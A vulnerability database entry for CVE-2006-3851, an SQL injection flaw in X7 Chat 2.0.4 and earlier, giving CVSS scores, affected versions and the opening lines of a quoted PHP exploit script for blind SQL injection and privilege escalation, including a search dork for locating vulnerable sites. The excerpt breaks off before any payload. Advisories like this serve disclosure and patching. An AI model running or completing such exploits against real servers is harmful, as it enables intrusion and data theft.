7.5
CVSSv2

CVE-2006-3851

Published: 25/07/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in upgradev1.php in X7 Chat 2.0.4 and previous versions allows remote malicious users to execute arbitrary SQL commands via the old_prefix parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

x7 group x7 chat 2.0

x7 group x7 chat 2.0.2

x7 group x7 chat 2.0.4

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "X7 Chat <=204 'old_prefix' blind SQL injection / privilege escalation exploit\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n"; echo "dork: \"Powered By X7 Chat\"\r\n\r\n"; if ($argc<3) { echo "Usage: php "$argv[0]" host path OPTIONS\r\n"; echo ...